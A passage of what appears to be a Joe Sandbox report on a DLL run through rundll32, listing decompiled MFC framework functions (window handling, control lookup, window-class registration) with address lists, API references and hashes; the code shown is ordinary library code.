					 *((intOrPtr*)(_t101 + 4)) =  *_t98( *((intOrPtr*)(E1000567F(0, _t103 - 0x7c, _t98, _t101, _t114))),  *((intOrPtr*)(E1000EC09(0, _t98, _t101, _t114) + 0x10)));
					_t52 = E10001260( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
				}
				if( *((intOrPtr*)(_t101 + 0xc)) == 0) {
					_t117 =  *((intOrPtr*)(_t101 + 0x10));
					if( *((intOrPtr*)(_t101 + 0x10)) != 0) {
						 *((intOrPtr*)(_t101 + 0xc)) =  *_t98( *((intOrPtr*)(E1000567F(0, _t103 - 0x7c, _t98, _t101, _t117))),  *((intOrPtr*)( *((intOrPtr*)(E1000EC09(0, _t98, _t101, _t117) + 4)) + 0x64)));
						_t52 = E10001260( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
					}
				}
				_pop(_t99);
				_pop(_t102);
				_pop(_t76);
				return E1001FBB5(_t52, _t76,  *(_t103 + 0x88) ^ _t103, _t96, _t99, _t102);
			}






















                                                                                                            0x1001d5eb
                                                                                                            0x1001d5ec
                                                                                                            0x1001d5f9
                                                                                                            0x1001d600
                                                                                                            0x1001d607
                                                                                                            0x1001d60e
                                                                                                            0x1001d614
                                                                                                            0x1001d61a
                                                                                                            0x1001d62c
                                                                                                            0x1001d62f
                                                                                                            0x1001d636
                                                                                                            0x1001d63c
                                                                                                            0x1001d6a6
                                                                                                            0x1001d6a8
                                                                                                            0x1001d6ad
                                                                                                            0x1001d6af
                                                                                                            0x1001d6b7
                                                                                                            0x1001d6b8
                                                                                                            0x1001d6cb
                                                                                                            0x1001d6d0
                                                                                                            0x1001d6d5
                                                                                                            0x1001d6ba
                                                                                                            0x1001d6ba
                                                                                                            0x1001d6bf
                                                                                                            0x1001d6c4
                                                                                                            0x1001d6c4
                                                                                                            0x1001d63e
                                                                                                            0x1001d641
                                                                                                            0x1001d648
                                                                                                            0x1001d64e
                                                                                                            0x1001d654
                                                                                                            0x1001d657
                                                                                                            0x1001d65a
                                                                                                            0x1001d65e
                                                                                                            0x1001d673
                                                                                                            0x1001d676
                                                                                                            0x1001d676
                                                                                                            0x1001d67b
                                                                                                            0x1001d67e
                                                                                                            0x1001d682
                                                                                                            0x1001d697
                                                                                                            0x1001d69a
                                                                                                            0x1001d69a
                                                                                                            0x1001d682
                                                                                                            0x1001d6ef
                                                                                                            0x1001d6f2
                                                                                                            0x1001d6f9
                                                                                                            0x1001d6fc
                                                                                                            0x1001d718
                                                                                                            0x1001d71b
                                                                                                            0x1001d71b
                                                                                                            0x1001d723
                                                                                                            0x1001d725
                                                                                                            0x1001d728
                                                                                                            0x1001d747
                                                                                                            0x1001d74a
                                                                                                            0x1001d74a
                                                                                                            0x1001d728
                                                                                                            0x1001d755
                                                                                                            0x1001d756
                                                                                                            0x1001d759
                                                                                                            0x1001d766

                                                                                                            APIs
                                                                                                            • _memset.LIBCMT ref: 1001D61A
                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 1001D66B
                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 1001D68F
                                                                                                              • Part of subcall function 1000567F: __EH_prolog3.LIBCMT ref: 10005686
                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 1001D6E7
                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 1001D710
                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 1001D73F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocString$H_prolog3_memset
                                                                                                            • String ID:
                                                                                                            • API String ID: 842698744-0
                                                                                                            • Opcode ID: df61c5337132f301d7380ed1605a359c448a967be7e87a7bfd6a5cb2acb23dbb
                                                                                                            • Instruction ID: 6e1135c887c9357414f922cece5f9f8fee59e25652f77c4319450727ae6b76bc
                                                                                                            • Opcode Fuzzy Hash: df61c5337132f301d7380ed1605a359c448a967be7e87a7bfd6a5cb2acb23dbb
                                                                                                            • Instruction Fuzzy Hash: 00415E34900208CFDB24EFB8D881A9EB7B1FF54354F10852EF5A69B2A6DB71A854CF54
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000772D Relevance: 9.1, APIs: 6, Instructions: 115threadwindowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 81%
                                                                                                            			E1000772D(void* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t37;
				signed int _t54;
				intOrPtr _t57;
				long _t60;
				struct HWND__* _t63;
				CHAR* _t64;
				void* _t65;
				void* _t67;
				void* _t71;
				void* _t72;
				long _t73;
				void* _t74;
				void* _t75;
				signed int _t77;
				void* _t78;
				signed int _t79;
				void* _t81;

				_t71 = __edx;
				_t79 = _t81 - 0x9c;
				_t37 =  *0x10045580; // 0x6a53a566
				 *(_t79 + 0x98) = _t37 ^ _t79;
				_t73 =  *(_t79 + 0xa4);
				_t77 = 0;
				 *((intOrPtr*)(_t79 - 0x80)) =  *((intOrPtr*)(_t79 + 0xa8));
				E1000764E(0);
				_t67 = _t72;
				_t63 = E10007682(0, _t79 - 0x70);
				 *(_t79 - 0x7c) = _t63;
				if(_t63 !=  *(_t79 - 0x70)) {
					EnableWindow(_t63, 1);
				}
				 *(_t79 - 0x78) =  *(_t79 - 0x78) & _t77;
				GetWindowThreadProcessId(_t63, _t79 - 0x78);
				if(_t63 == 0 ||  *(_t79 - 0x78) != GetCurrentProcessId()) {
					L6:
					__eflags = _t73;
					if(__eflags != 0) {
						_t77 = _t73 + 0x78;
					}
					goto L8;
				} else {
					_t60 = SendMessageA(_t63, 0x376, 0, 0);
					if(_t60 == 0) {
						goto L6;
					} else {
						_t77 = _t60;
						L8:
						 *(_t79 - 0x74) =  *(_t79 - 0x74) & 0x00000000;
						if(_t77 != 0) {
							 *(_t79 - 0x74) =  *_t77;
							_t57 =  *((intOrPtr*)(_t79 + 0xb0));
							if(_t57 != 0) {
								 *_t77 = _t57 + 0x30000;
							}
						}
						if(( *(_t79 + 0xac) & 0x000000f0) == 0) {
							_t54 =  *(_t79 + 0xac) & 0x0000000f;
							if(_t54 <= 1) {
								_t24 = _t79 + 0xac;
								 *_t24 =  *(_t79 + 0xac) | 0x00000030;
								__eflags =  *_t24;
							} else {
								if(_t54 + 0xfffffffd <= 1) {
									 *(_t79 + 0xac) =  *(_t79 + 0xac) | 0x00000020;
								}
							}
						}
						_t96 = _t73;
						 *(_t79 - 0x6c) = 0;
						if(_t73 == 0) {
							_t64 = _t79 - 0x6c;
							_t73 = 0x104;
							__eflags = GetModuleFileNameA(0, _t64, 0x104) - 0x104;
							if(__eflags == 0) {
								 *((char*)(_t79 + 0x97)) = 0;
							}
						} else {
							_t64 =  *(_t73 + 0x50);
						}
						_push( *(_t79 + 0xac));
						_push(_t64);
						_push( *((intOrPtr*)(_t79 - 0x80)));
						_push( *(_t79 - 0x7c));
						_t74 = E100075B7(_t64, _t67, _t73, _t77, _t96);
						if(_t77 != 0) {
							 *_t77 =  *(_t79 - 0x74);
						}
						if( *(_t79 - 0x70) != 0) {
							EnableWindow( *(_t79 - 0x70), 1);
						}
						E1000764E(1);
						_pop(_t75);
						_pop(_t78);
						_pop(_t65);
						return E1001FBB5(_t74, _t65,  *(_t79 + 0x98) ^ _t79, _t71, _t75, _t78);
					}
				}
			}
























                                                                                                            0x1000772d
                                                                                                            0x1000772e
                                                                                                            0x1000773b
                                                                                                            0x10007742
                                                                                                            0x10007751
                                                                                                            0x10007757
                                                                                                            0x1000775a
                                                                                                            0x1000775d
                                                                                                            0x10007762
                                                                                                            0x1000776d
                                                                                                            0x10007772
                                                                                                            0x10007775
                                                                                                            0x1000777a
                                                                                                            0x1000777a
                                                                                                            0x10007780
                                                                                                            0x10007788
                                                                                                            0x10007790
                                                                                                            0x100077b5
                                                                                                            0x100077b5
                                                                                                            0x100077b7
                                                                                                            0x100077b9
                                                                                                            0x100077b9
                                                                                                            0x00000000
                                                                                                            0x1000779d
                                                                                                            0x100077a7
                                                                                                            0x100077af
                                                                                                            0x00000000
                                                                                                            0x100077b1
                                                                                                            0x100077b1
                                                                                                            0x100077bc
                                                                                                            0x100077bc
                                                                                                            0x100077c2
                                                                                                            0x100077c6
                                                                                                            0x100077c9
                                                                                                            0x100077d1
                                                                                                            0x100077d8
                                                                                                            0x100077d8
                                                                                                            0x100077d1
                                                                                                            0x100077e1
                                                                                                            0x100077e9
                                                                                                            0x100077ef
                                                                                                            0x10007802
                                                                                                            0x10007802
                                                                                                            0x10007802
                                                                                                            0x100077f1
                                                                                                            0x100077f7
                                                                                                            0x100077f9
                                                                                                            0x100077f9
                                                                                                            0x100077f7
                                                                                                            0x100077ef
                                                                                                            0x10007809
                                                                                                            0x1000780b
                                                                                                            0x1000780f
                                                                                                            0x10007816
                                                                                                            0x10007819
                                                                                                            0x1000782a
                                                                                                            0x1000782c
                                                                                                            0x1000782e
                                                                                                            0x1000782e
                                                                                                            0x10007811
                                                                                                            0x10007811
                                                                                                            0x10007811
                                                                                                            0x10007835
                                                                                                            0x1000783b
                                                                                                            0x1000783c
                                                                                                            0x1000783f
                                                                                                            0x1000784c
                                                                                                            0x1000784e
                                                                                                            0x10007853
                                                                                                            0x10007853
                                                                                                            0x10007859
                                                                                                            0x10007860
                                                                                                            0x10007860
                                                                                                            0x10007868
                                                                                                            0x10007876
                                                                                                            0x10007877
                                                                                                            0x1000787a
                                                                                                            0x10007887
                                                                                                            0x10007887
                                                                                                            0x100077af

                                                                                                            APIs
                                                                                                              • Part of subcall function 10007682: GetParent.USER32(?), ref: 100076D5
                                                                                                              • Part of subcall function 10007682: GetLastActivePopup.USER32(?), ref: 100076E4
                                                                                                              • Part of subcall function 10007682: IsWindowEnabled.USER32(?), ref: 100076F9
                                                                                                              • Part of subcall function 10007682: EnableWindow.USER32(?,00000000), ref: 1000770C
                                                                                                            • EnableWindow.USER32(?,00000001), ref: 1000777A
                                                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 10007788
                                                                                                            • GetCurrentProcessId.KERNEL32(?,?), ref: 10007792
                                                                                                            • SendMessageA.USER32(?,00000376,00000000,00000000), ref: 100077A7
                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 10007824
                                                                                                            • EnableWindow.USER32(?,00000001), ref: 10007860
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 1877664794-0
                                                                                                            • Opcode ID: f2399ea1d54a9bf52ed2f5ca6e2961852035bc04a76c1f8deff7aeca07201bb6
                                                                                                            • Instruction ID: bdb92c1df6b4a8dc20cb8eb5586ece2812bcce3fef41ea9017e6a72a13aca31b
                                                                                                            • Opcode Fuzzy Hash: f2399ea1d54a9bf52ed2f5ca6e2961852035bc04a76c1f8deff7aeca07201bb6
                                                                                                            • Instruction Fuzzy Hash: DB417B32E002589FFB31CF74CC89B9D77A8FF05280F214119E95D9B286EB799944CB61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10007682 Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10007682(struct HWND__* _a4, struct HWND__** _a8) {
				struct HWND__* _t7;
				void* _t13;
				struct HWND__** _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;
				struct HWND__* _t18;

				_t18 = _a4;
				_t17 = _t18;
				if(_t18 != 0) {
					L5:
					if((GetWindowLongA(_t17, 0xfffffff0) & 0x40000000) == 0) {
						L8:
						_t16 = _t17;
						_t7 = _t17;
						if(_t17 == 0) {
							L10:
							if(_t18 == 0 && _t17 != 0) {
								_t17 = GetLastActivePopup(_t17);
							}
							_t15 = _a8;
							if(_t15 != 0) {
								if(_t16 == 0 || IsWindowEnabled(_t16) == 0 || _t16 == _t17) {
									 *_t15 =  *_t15 & 0x00000000;
								} else {
									 *_t15 = _t16;
									EnableWindow(_t16, 0);
								}
							}
							return _t17;
						} else {
							goto L9;
						}
						do {
							L9:
							_t16 = _t7;
							_t7 = GetParent(_t7);
						} while (_t7 != 0);
						goto L10;
					}
					_t17 = GetParent(_t17);
					L7:
					if(_t17 != 0) {
						goto L5;
					}
					goto L8;
				}
				_t13 = E100075AB();
				if(_t13 != 0) {
					L4:
					_t17 =  *(_t13 + 0x20);
					goto L7;
				}
				_t13 = E10005CAE();
				if(_t13 != 0) {
					goto L4;
				}
				_t17 = 0;
				goto L8;
			}









                                                                                                            0x1000768a
                                                                                                            0x10007692
                                                                                                            0x10007694
                                                                                                            0x100076b1
                                                                                                            0x100076bf
                                                                                                            0x100076ca
                                                                                                            0x100076cc
                                                                                                            0x100076ce
                                                                                                            0x100076d0
                                                                                                            0x100076db
                                                                                                            0x100076dd
                                                                                                            0x100076ea
                                                                                                            0x100076ea
                                                                                                            0x100076ec
                                                                                                            0x100076f2
                                                                                                            0x100076f6
                                                                                                            0x10007714
                                                                                                            0x10007707
                                                                                                            0x1000770a
                                                                                                            0x1000770c
                                                                                                            0x1000770c
                                                                                                            0x100076f6
                                                                                                            0x1000771d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100076d2
                                                                                                            0x100076d2
                                                                                                            0x100076d3
                                                                                                            0x100076d5
                                                                                                            0x100076d7
                                                                                                            0x00000000
                                                                                                            0x100076d2
                                                                                                            0x100076c4
                                                                                                            0x100076c6
                                                                                                            0x100076c8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100076c8
                                                                                                            0x10007696
                                                                                                            0x1000769d
                                                                                                            0x100076ac
                                                                                                            0x100076ac
                                                                                                            0x00000000
                                                                                                            0x100076ac
                                                                                                            0x1000769f
                                                                                                            0x100076a6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100076a8
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                            • String ID:
                                                                                                            • API String ID: 670545878-0
                                                                                                            • Opcode ID: 0495e4ef43923a245b0fe769c269373e2e029a288f2a749e2dd0ce88f3e134b5
                                                                                                            • Instruction ID: 462ae3bbbf91228899846c1fb6a9f27f843f520308df6a83637efefa3aec2235
                                                                                                            • Opcode Fuzzy Hash: 0495e4ef43923a245b0fe769c269373e2e029a288f2a749e2dd0ce88f3e134b5
                                                                                                            • Instruction Fuzzy Hash: 3411CE72E04A365BF2229A6D8C80B1B77DCFF49AE0F124115EC0EE7219DB6ACC0046F5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10011181 Relevance: 9.0, APIs: 6, Instructions: 45COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 90%
                                                                                                            			E10011181(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
				struct tagRECT _v20;
				struct HWND__* _t12;
				struct HWND__* _t21;

				ClientToScreen(_a4,  &_a8);
				_t12 = GetWindow(_a4, 5);
				while(1) {
					_t21 = _t12;
					if(_t21 == 0) {
						break;
					}
					if(GetDlgCtrlID(_t21) != 0 && (GetWindowLongA(_t21, 0xfffffff0) & 0x10000000) != 0) {
						GetWindowRect(_t21,  &_v20);
						_push(_a12);
						if(PtInRect( &_v20, _a8) != 0) {
							return _t21;
						}
					}
					_t12 = GetWindow(_t21, 2);
				}
				return _t12;
			}






                                                                                                            0x10011190
                                                                                                            0x100111e1
                                                                                                            0x100111e1
                                                                                                            0x100111e3
                                                                                                            0x100111e7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100111ad
                                                                                                            0x100111c4
                                                                                                            0x100111ca
                                                                                                            0x100111dc
                                                                                                            0x00000000
                                                                                                            0x100111ef
                                                                                                            0x100111dc
                                                                                                            0x100111e1
                                                                                                            0x100111e1
                                                                                                            0x100111ec

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1315500227-0
                                                                                                            • Opcode ID: 0bb2bf6e42f8f06f434990d85aaec66e0fa50538ae204af0560bac11247d4450
                                                                                                            • Instruction ID: 0af4e894630c16eeb035fae8976970eddf4787ec4e71c720814606927fab57bb
                                                                                                            • Opcode Fuzzy Hash: 0bb2bf6e42f8f06f434990d85aaec66e0fa50538ae204af0560bac11247d4450
                                                                                                            • Instruction Fuzzy Hash: 05014B36A0112ABBEB129F958C48EDE7BACEF49791F008014FE11AE061D730DB458BA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000D1F4 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 234COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 94%
                                                                                                            			E1000D1F4(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				char* _v20;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v40;
				intOrPtr _v52;
				signed int _v56;
				void* __ebp;
				intOrPtr _t122;
				void* _t128;
				intOrPtr _t130;
				signed int _t139;
				signed int _t144;
				signed int _t175;
				signed int _t177;
				signed int _t179;
				signed int _t181;
				signed int _t183;
				signed int _t187;
				void* _t190;
				intOrPtr _t191;
				signed int _t201;

				_t190 = __ecx;
				_t122 = E1000EC09(__ebx, __edi, __esi, __eflags);
				_v8 = _t122;
				_t3 =  &_a4;
				 *_t3 = _a4 &  !( *(_t122 + 0x18));
				if( *_t3 == 0) {
					return 1;
				}
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t201 = 0;
				E10020F40(0,  &_v56, 0, 0x28);
				_v52 = DefWindowProcA;
				_t128 = E1000EC09(__ebx, 0, 0, __eflags);
				__eflags = _a4 & 0x00000001;
				_v40 =  *((intOrPtr*)(_t128 + 8));
				_t130 =  *0x10048658; // 0x10003
				_t187 = 8;
				_v32 = _t130;
				_v16 = _t187;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0xb;
					_v20 = "AfxWnd80s";
					_t183 = E1000D010(_t187, _t190, 0, 0, __eflags);
					__eflags = _t183;
					if(_t183 != 0) {
						_t201 = 1;
						__eflags = 1;
					}
				}
				__eflags = _a4 & 0x00000020;
				if(__eflags != 0) {
					_v56 = _v56 | 0x0000008b;
					_push( &_v56);
					_v20 = "AfxOleControl80s";
					_t181 = E1000D010(_t187, _t190, 0, _t201, __eflags);
					__eflags = _t181;
					if(_t181 != 0) {
						_t201 = _t201 | 0x00000020;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000002;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0;
					_v20 = "AfxControlBar80s";
					_v28 = 0x10;
					_t179 = E1000D010(_t187, _t190, 0, _t201, __eflags);
					__eflags = _t179;
					if(_t179 != 0) {
						_t201 = _t201 | 0x00000002;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000004;
				if(__eflags != 0) {
					_v56 = _t187;
					_v28 = 0;
					_t177 = E1000D1B3(_t190, __eflags,  &_v56, "AfxMDIFrame80s", 0x7a01);
					__eflags = _t177;
					if(_t177 != 0) {
						_t201 = _t201 | 0x00000004;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & _t187;
				if(__eflags != 0) {
					_v56 = 0xb;
					_v28 = 6;
					_t175 = E1000D1B3(_t190, __eflags,  &_v56, "AfxFrameOrView80s", 0x7a02);
					__eflags = _t175;
					if(_t175 != 0) {
						_t201 = _t201 | _t187;
						__eflags = _t201;
					}
				}
				__eflags = _a4 & 0x00000010;
				if(__eflags != 0) {
					_v12 = 0xff;
					_t201 = _t201 | E1000AE1B(_t187, _t190, _t201, __eflags,  &_v16, 0x3fc0);
					_t48 =  &_a4;
					 *_t48 = _a4 & 0xffffc03f;
					__eflags =  *_t48;
				}
				__eflags = _a4 & 0x00000040;
				if(__eflags != 0) {
					_v12 = 0x10;
					_t201 = _t201 | E1000AE1B(_t187, _t190, _t201, __eflags,  &_v16, 0x40);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000080;
				if(__eflags != 0) {
					_v12 = 2;
					_t201 = _t201 | E1000AE1B(_t187, _t190, _t201, __eflags,  &_v16, 0x80);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000100;
				if(__eflags != 0) {
					_v12 = _t187;
					_t201 = _t201 | E1000AE1B(_t187, _t190, _t201, __eflags,  &_v16, 0x100);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000200;
				if(__eflags != 0) {
					_v12 = 0x20;
					_t201 = _t201 | E1000AE1B(_t187, _t190, _t201, __eflags,  &_v16, 0x200);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000400;
				if(__eflags != 0) {
					_v12 = 1;
					_t201 = _t201 | E1000AE1B(0x400, _t190, _t201, __eflags,  &_v16, 0x400);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00000800;
				if(__eflags != 0) {
					_v12 = 0x40;
					_t201 = _t201 | E1000AE1B(0x400, _t190, _t201, __eflags,  &_v16, 0x800);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00001000;
				if(__eflags != 0) {
					_v12 = 4;
					_t201 = _t201 | E1000AE1B(0x400, _t190, _t201, __eflags,  &_v16, 0x1000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00002000;
				if(__eflags != 0) {
					_v12 = 0x80;
					_t201 = _t201 | E1000AE1B(0x400, _t190, _t201, __eflags,  &_v16, 0x2000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00004000;
				if(__eflags != 0) {
					_v12 = 0x800;
					_t201 = _t201 | E1000AE1B(0x400, _t190, _t201, __eflags,  &_v16, 0x4000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00008000;
				if(__eflags != 0) {
					_v12 = 0x400;
					_t201 = _t201 | E1000AE1B(0x400, _t190, _t201, __eflags,  &_v16, 0x8000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00010000;
				if(__eflags != 0) {
					_v12 = 0x200;
					_t201 = _t201 | E1000AE1B(0x400, _t190, _t201, __eflags,  &_v16, 0x10000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00020000;
				if(__eflags != 0) {
					_v12 = 0x100;
					_t201 = _t201 | E1000AE1B(0x400, _t190, _t201, __eflags,  &_v16, 0x20000);
					__eflags = _t201;
				}
				__eflags = _a4 & 0x00040000;
				if(__eflags != 0) {
					_v12 = 0x8000;
					_t201 = _t201 | E1000AE1B(0x400, _t190, _t201, __eflags,  &_v16, 0x40000);
					__eflags = _t201;
				}
				_t191 = _v8;
				 *(_t191 + 0x18) =  *(_t191 + 0x18) | _t201;
				_t139 =  *(_t191 + 0x18);
				__eflags = (_t139 & 0x00003fc0) - 0x3fc0;
				if((_t139 & 0x00003fc0) == 0x3fc0) {
					 *(_t191 + 0x18) = _t139 | 0x00000010;
					_t201 = _t201 | 0x00000010;
					__eflags = _t201;
				}
				asm("sbb eax, eax");
				_t144 =  ~((_t201 & _a4) - _a4) + 1;
				__eflags = _t144;
				return _t144;
			}



























                                                                                                            0x1000d1f4
                                                                                                            0x1000d1fa
                                                                                                            0x1000d1ff
                                                                                                            0x1000d207
                                                                                                            0x1000d207
                                                                                                            0x1000d20a
                                                                                                            0x00000000
                                                                                                            0x1000d20e
                                                                                                            0x1000d214
                                                                                                            0x1000d215
                                                                                                            0x1000d216
                                                                                                            0x1000d220
                                                                                                            0x1000d222
                                                                                                            0x1000d22f
                                                                                                            0x1000d232
                                                                                                            0x1000d237
                                                                                                            0x1000d240
                                                                                                            0x1000d243
                                                                                                            0x1000d248
                                                                                                            0x1000d249
                                                                                                            0x1000d24c
                                                                                                            0x1000d24f
                                                                                                            0x1000d254
                                                                                                            0x1000d255
                                                                                                            0x1000d25c
                                                                                                            0x1000d263
                                                                                                            0x1000d268
                                                                                                            0x1000d26a
                                                                                                            0x1000d26c
                                                                                                            0x1000d26c
                                                                                                            0x1000d26c
                                                                                                            0x1000d26a
                                                                                                            0x1000d26d
                                                                                                            0x1000d271
                                                                                                            0x1000d273
                                                                                                            0x1000d27d
                                                                                                            0x1000d27e
                                                                                                            0x1000d285
                                                                                                            0x1000d28a
                                                                                                            0x1000d28c
                                                                                                            0x1000d28e
                                                                                                            0x1000d28e
